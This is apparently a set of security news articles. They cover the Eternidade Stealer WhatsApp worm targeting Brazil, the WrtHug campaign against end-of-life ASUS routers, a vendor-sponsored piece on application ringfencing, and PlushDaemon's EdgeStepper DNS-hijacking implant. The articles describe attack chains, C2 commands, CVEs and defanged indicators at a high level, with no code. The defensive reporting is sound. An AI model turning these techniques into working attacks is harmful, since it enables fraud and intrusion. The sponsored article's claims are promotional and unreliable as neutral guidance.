Cybersecurity researchers have disclosed details of a new campaign that leverages a combination of social engineering and WhatsApp hijacking to distribute a Delphi-based banking trojan named Eternidade Stealer as part of attacks targeting users in Brazil. “It uses Internet Message Access Protocol (IMAP) to dynamically retrieve command-and-control (C2) addresses, allowing the threat actor to update its C2 server,” Trustwave SpiderLabs researchers Nathaniel Morales, John Basmayor, and Nikita Kazymirskyi said in a technical breakdown of the campaign shared with The Hacker News. “It is distributed through a WhatsApp worm campaign, with the actor now deploying a Python script, a shift from previous PowerShell-based scripts to hijack WhatsApp and spread malicious attachments. The findings come close on the heels of another campaign dubbed Water Saci that has targeted Brazilian users with a worm that propagates via WhatsApp Web known as SORVEPOTEL, which then acts as a conduit for Maverick , a .NET banking trojan that’s assessed to be an evolution of a .NET banking malware dubbed Coyote .
The Eternidade Stealer cluster is part of a broader activity that has abused the ubiquity of WhatsApp in the South American country to compromise target victim systems and use the messaging app as a propagation vector to launch large-scale attacks against Brazilian institutions. Another notable trend is the continued preference for Delphi-based malware for threat actors targeting Latin America, largely driven not only because of its technical efficiency but also by the fact that the programming language was taught and used in software development in the region. The starting point of the attack is an obfuscated Visual Basic Script, which features comments written mainly in Portuguese. The script, once executed, drops a batch script that’s responsible for delivering two payloads, effectively forking the infection chain into two - A Python script that triggers WhatsApp Web-based dissemination of the malware in a worm-like fashion An MSI installer that makes use of an AutoIt script to launch Eternidade Stealer The Python script, similar to SORVEPOTEL, establishes communication with a remote server and leverages the open-source project WPPConnect to automate the sending of messages in hijacked accounts via WhatsApp.
To do this, it harvests a victim’s entire contact list, while filtering out groups, business contacts, and broadcast lists. The malware then proceeds to capture, for each contact, their WhatsApp phone number, name, and information signaling whether they are a saved contact. This information is sent to the attacker-controlled server over an HTTP POST request. In the final stage, a malicious attachment is sent to all the contacts in the form of a malicious attachment by making use of a messaging template and populating certain fields with time-based greetings and contact names.
The second leg of the attack commences with the MSI installer dropping several payloads, including an AutoIt script that checks to see if the compromised system is based in Brazil by inspecting whether the operating system language is Brazilian Portuguese. If not, the malware self-terminates. This indicates a hyper-localized targeting effort on the part of the threat actors. The script subsequently scans running processes and registry keys to ascertain the presence of installed security products.
It also profiles the machine and sends the details to a command-and-control (C2) server. The attack culminates with the malware injecting the Eternidade Stealer payload into “svchost.exe” using process hollowing. A Delphi-based credential stealer, Eternidade continuously scans active windows and running processes for strings related to banking portals, payment services, and cryptocurrency exchanges and wallets, such as Bradesco, BTG Pactual, MercadoPago, Stripe, Binance, Coinbase, MetaMask, and Trust Wallet, among others. “Such a behavior reflects a classic banker or overlay-stealer tactic, where malicious components lie dormant until the victim opens a targeted banking or wallet application, ensuring the attack triggers only in relevant contexts and remains invisible to casual users or sandbox environments,” the researchers said.
Once a match is found, it contacts a C2 server, details for which are fetched from an inbox linked to a terra.com[.]br email address, mirroring a tactic recently adopted by Water Saci. This allows the threat actors to update their C2, maintain persistence, and evade detections or takedowns. In the event that the malware is unable to connect to the email account using hard-coded credentials, it uses a fallback C2 address embedded in the source code. As soon as a successful connection with the server is established, the malware awaits incoming messages that are then processed and executed on the infected hosts, enabling the attackers to record keystrokes, capture screenshots, and steal files.
Some of the notable commands are listed below - <|OK|>, to collect system information <|PING|>, to monitor user activity and report the currently active window <|PedidoSenhas|>, to send a custom overlay for credential theft based on the active window Trustwave said an analysis of threat actor infrastructure led to the discovery of two panels, one for managing the Redirector System and another login panel, likely used to monitor infected hosts. The Redirector System contains logs showing the total number of visits and blocks for connections attempting to reach the C2 address. While the system only permits access to machines located in Brazil and Argentina, blocked connections are redirected to “google[.]com/error.” Statistics recorded on the panel show that 452 out of 454 visits were blocked due to the geofencing restrictions. Only the remaining two visits are said to have been redirected to the campaign’s targeted domain.
Of the 454 communication records, 196 connections originated from the U.S., followed by the Netherlands (37), Germany (32), the U.K. (23), France (19), and Brazil (3). The Windows operating system accounted for 115 connections, although panel data indicates that connections also came from macOS (94), Linux (45), and Android (18). Despite the high degree of similarity with Water Saci, Trustwave told The Hacker News there is no evidence to suggest the underlying infrastructure is being shared or sold as a service.
It also added that the presence of unique artifacts written in Python (as opposed to PowerShell in the case of Water Saci) indicates this is “either a small team or one person with Copilot.” “Although the malware family and delivery vectors are primarily Brazilian, the possible operational footprint and victim exposure are far more global,” Trustwave said. “Cybersecurity defenders should remain vigilant for suspicious WhatsApp activity, unexpected MSI or script executions, and indicators linked to this ongoing campaign.” Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
WrtHug Exploits Six ASUS WRT Flaws to Hijack Tens of Thousands of EoL Routers Worldwide
A newly discovered campaign has compromised tens of thousands of outdated or end-of-life (EoL) ASUS routers worldwide, predominantly in Taiwan, the U.S., and Russia, to rope them into a massive network. The router hijacking activity has been codenamed Operation WrtHug by SecurityScorecard’s STRIKE team. Southeast Asia and European countries are some of the other regions where infections have been recorded. Over the past six months, more than 50,000 unique IP addresses belonging to these compromised devices around the globe have been identified.
The attacks likely involve the exploitation of six known security flaws in end-of-life ASUS WRT routers to take control of susceptible devices. All the infected routers have been found to share a unique self-signed TLS certificate with an expiration date set for 100 years from April 2022. SecurityScorecard said 99% of the services presenting the certificate are ASUS AiCloud, a proprietary service designed to enable access to local storage via the internet. “It leverages the proprietary AiCloud service with n-day vulnerabilities in order to gain high privileges on End-Of-Life ASUS WRT routers,” the company said in a report shared with The Hacker News, adding the campaign, while not exactly an Operational Relay Box (ORB), bears similarities with other China-linked ORBs and botnet networks.
The attacks likely exploit vulnerabilities tracked as CVE-2023-41345 , CVE-2023-41346 , CVE-2023-41347 , CVE-2023-41348 , CVE-2023-39780 , CVE-2024-12912 , and CVE-2025-2492 for proliferation. Interestingly, the exploitation of CVE-2023-39780 has also been linked to another Chinese-origin botnet dubbed AyySSHush (aka ViciousTrap). Two other ORBs that have targeted routers in recent months are LapDogs and PolarEdge . Out of all the infected devices, seven IP addresses have been flagged for exhibiting signs of compromise associated with both WrtHug and AyySSHush, potentially raising the possibility that the two clusters could be related.
That being said, there is no evidence to back this hypothesis beyond the shared vulnerability. The list of router models targeted in the attacks is below - ASUS Wireless Router 4G-AC55U ASUS Wireless Router 4G-AC860U ASUS Wireless Router DSL-AC68U ASUS Wireless Router GT-AC5300 ASUS Wireless Router GT-AX11000 ASUS Wireless Router RT-AC1200HP ASUS Wireless Router RT-AC1300GPLUS ASUS Wireless Router RT-AC1300UHP It’s currently not clear who is behind the operation, but the extensive targeting of Taiwan and overlaps with previous tactics observed in ORB campaigns from Chinese hacking groups suggest it could be the work of an unknown China-affiliated actor. “This research highlights the growing trend of malicious threat actors targeting routers and other network devices in mass infection operations,” SecurityScorecard said. “These are commonly (but not exclusively) linked to China Nexus actors, who execute their campaigns in a careful and calculated manner to expand and deepen their global reach.” “By chaining command injections and authentication bypasses, threat actors have managed to deploy persistent backdoors via SSH, often abusing legitimate router features to ensure their presence survives reboots or firmware updates.” Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Application Containment: How to Use Ringfencing to Prevent the Weaponization of Trusted Software
The challenge facing security leaders is monumental: Securing environments where failure is not an option. Reliance on traditional security postures, such as Endpoint Detection and Response (EDR) to chase threats after they have already entered the network, is fundamentally risky and contributes significantly to the half-trillion-dollar annual cost of cybercrime. Zero Trust fundamentally shifts this approach, transitioning from reacting to symptoms to proactively solving the underlying problem. Application Control, the ability to rigorously define what software is allowed to execute, is the foundation of this strategy.
However, even once an application is trusted, it can be misused. This is where ThreatLocker Ringfencing™, or granular application containment , becomes indispensable, enforcing the ultimate standard of least privilege on all authorized applications. Defining Ringfencing: Security Beyond Allowlisting Ringfencing is an advanced containment strategy applied to applications that have already been approved to run. While allowlisting ensures a fundamental deny-by-default posture for all unknown software, Ringfencing further restricts the capabilities of the permitted software.
It operates by dictating precisely what an application can access, including files, registry keys, network resources, and other applications or processes. This granular control is vital because threat actors frequently bypass security controls by misusing legitimate, approved software, a technique commonly referred to as “living off the land.” Uncontained applications, such as productivity suites or scripting tools, can be weaponized to spawn risky child processes (like PowerShell or Command Prompt) or communicate with unauthorized external servers. The Security Imperative: Stopping Overreach Without effective containment, security teams leave wide open attack vectors that lead directly to high-impact incidents. Mitigating Lateral Movement: Ringfencing isolates application behaviors, hindering the ability of compromised processes to move across the network.
Policies can be set to restrict outbound network traffic, a measure that would have foiled major attacks that relied on servers reaching out to malicious endpoints for instructions. Containing High-Risk Applications: A critical use case is reducing the risk associated with legacy files or scripts, such as Office macros. By applying containment, applications like Word or Excel, even if required by departments like Finance, are restricted from launching high-risk script engines like PowerShell or accessing high-risk directories. Preventing Data Exfiltration and Encryption: Containment policies can limit an application’s ability to read or write to sensitive monitored paths (such as document folders or backup directories), effectively blocking mass data exfiltration attempts and preventing ransomware from encrypting files outside its designated scope.
Ringfencing inherently supports compliance goals by ensuring that all applications operate strictly with the permissions they truly require, aligning security efforts with best-practice standards such as CIS Controls. Mechanics: How Granular Containment Works Ringfencing policies provide comprehensive control over multiple vectors of application behavior, functioning as a second layer of defense after execution is permitted. A policy dictates whether an application can access certain files and folders or make changes to the system registry. Most importantly, it governs Inter-Process Communication (IPC), ensuring an approved application cannot interact with or spawn unauthorized child processes.
For instance, Ringfencing blocks Word from launching PowerShell or other unauthorized child processes . Implementing Application Containment Adopting Ringfencing requires a disciplined, phased implementation focused on avoiding operational disruption and political fallout. Establishing the Baseline Implementation starts by deploying a monitoring agent to establish visibility. The agent should be deployed first to a small test group or isolated test organization—often affectionately called the guinea pigs—to monitor activity.
In this initial Learning Mode, the system logs all executions, elevations, and network activity without blocking anything. Simulation and Enforcement Before any policy is secured, the team should utilize the Unified Audit to run simulations (simulated denies). This preemptive auditing shows precisely what actions would be blocked if the new policy was enforced, allowing security professionals to make necessary exceptions upfront and prevent tanking the IT department’s approval rating. Ringfencing policies are then typically created and enforced first on applications recognized as high-risk, such as PowerShell, Command Prompt, Registry Editor, and 7-Zip, due to their high potential for weaponization.
Teams should ensure that they have been properly tested before moving to a secure, enforcing state. Scaling and Refinement Once policies are validated in the test environment, deployment is scaled gradually across the organization, typically starting with easy wins and moving slowly towards the hardest groups. Policies should be continuously reviewed and refined, including regularly removing unused policies to reduce administrative clutter. Strategic Deployment and Best Practices To maximize the benefits of application containment while minimizing user friction, leaders should adhere to proven strategies: Start Small and Phased: Always apply new Ringfencing policies to a non-critical test group first.
Avoid solving all business problems at once; tackle highly dangerous software first (like Russian remote access tools), and delay political decisions (like blocking games) until later phases. Continuous Monitoring: Regularly review the Unified Audit and check for simulated denies before securing any policy to ensure legitimate functions are not broken. Combine Controls: Ringfencing is most effective when paired with Application Allowlisting (deny-by-default). It should also be combined with Storage Control to protect critical data to prevent mass data loss or exfiltration.
Prioritize Configuration Checks: Utilize automated tools, like Defense Against Configurations (DAC), to verify that Ringfencing and other security measures are properly configured across all endpoints, highlighting where settings might have lapsed into monitor-only mode. Outcomes and Organizational Gains By implementing Ringfencing, organizations transition from a reactive model—where highly paid cybersecurity professionals spend time chasing alerts—to a proactive, hardened architecture. This approach offers significant value beyond just security: Operational Efficiency: Application control significantly reduces Security Operations Center (SOC) alerts —in some cases by up to 90%—resulting in less alert fatigue and substantial savings in time and resources. Enhanced Security: It stops the abuse of trusted programs, contains threats, and makes the cybercriminal’s life as difficult as possible.
Business Value: It minimizes application overreach without breaking business-critical workflows, such as those required by the finance department for legacy macros. Ultimately, Ringfencing strengthens the Zero Trust mindset, ensuring that every application, user, and device operates strictly within the boundaries of its necessary function, making detection and response truly a backup plan, rather than the primary defense. Found this article interesting? This article is a contributed piece from one of our valued partners.
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
EdgeStepper Implant Reroutes DNS Queries to Deploy Malware via Hijacked Software Updates
The threat actor known as PlushDaemon has been observed using a previously undocumented Go-based network backdoor codenamed EdgeStepper to facilitate adversary-in-the-middle (AitM) attacks. EdgeStepper “redirects all DNS queries to an external, malicious hijacking node, effectively rerouting the traffic from legitimate infrastructure used for software updates to attacker-controlled infrastructure,” ESET security researcher Facundo Muñoz said in a report shared with The Hacker News. Known to be active since at least 2018, PlushDaemon is assessed to be a China-aligned group that has attacked entities in the U.S., New Zealand, Cambodia, Hong Kong, Taiwan, South Korea, and mainland China. It was first documented by the Slovak cybersecurity company earlier this January, detailing a supply chain attack aimed at a South Korean virtual private network (VPN) provider named IPany to target a semiconductor company and an unidentified software development company in South Korea with a feature-rich implant dubbed SlowStepper.
Among the adversary’s victims include a university in Beijing, a Taiwanese company that manufactures electronics, a company in the automotive sector, and a branch of a Japanese company in the manufacturing sector. Earlier this month, ESET also said it observed PlushDaemon targeting two entities in Cambodia this year, a company in the automotive sector and a branch of a Japanese company in the manufacturing sector, with SlowStepper. The primary initial access mechanism for the threat actor is to leverage AitM poisoning, a technique that has been embraced by an “ever increasing” number of China-affiliated advanced persistent threat (APT) clusters in the last two years, such as LuoYu, Evasive Panda, BlackTech, TheWizards APT, Blackwood, and FontGoblin. ESET said it’s tracking ten active China-aligned groups that have hijacked software update mechanisms for initial access and lateral movement.
The attack essentially commences with the threat actor compromising an edge network device (e.g., a router) that its target is likely to connect to. This is accomplished by either exploiting a security flaw in the software or through weak credentials, allowing them to deploy caEdgeStepper. “Then, EdgeStepper begins redirecting DNS queries to a malicious DNS node that verifies whether the domain in the DNS query message is related to software updates, and if so, it replies with the IP address of the hijacking node,” Muñoz explained. “Alternatively, we have also observed that some servers are both the DNS node and the hijacking node; in those cases, the DNS node replies to DNS queries with its own IP address.” Internally, the malware consists of two moving parts: a Distributor module that resolves the IP address associated with the DNS node domain (“test.dsc.wcsset[.]com”) and invokes the Ruler component responsible for configuring IP packet filter rules using iptables.
The attack specifically checks for several Chinese software, including Sogou Pinyin, to have their update channels hijacked by means of EdgeStepper to deliver a malicious DLL (“popup_4.2.0.2246.dll” aka LittleDaemon) from a threat actor-controlled server. A first-stage deployed through hijacked updates, LittleDaemon is designed to communicate with the attacker node to fetch a downloader referred to as DaemonicLogistics if SlowStepper is not running on the infected system. The main purpose of DaemonicLogistics is to download the SlowStepper backdoor from the server and execute it. SlowStepper supports an extensive set of features to gather system information, files, browser credentials, extract data from a number of messaging apps, and even uninstall itself.
“These implants give PlushDaemon the capability to compromise targets anywhere in the world,” Muñoz said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.